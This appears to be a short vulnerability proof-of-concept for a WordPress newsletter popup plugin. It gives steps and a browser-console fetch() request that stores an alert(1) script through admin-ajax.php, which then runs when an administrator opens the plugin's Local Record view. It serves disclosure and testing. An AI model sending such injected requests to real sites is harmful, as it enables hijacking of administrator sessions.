1. Create a Newsletter popup (any will do) and publish it.

2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); 

3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.

4. The alert will trigger successfully.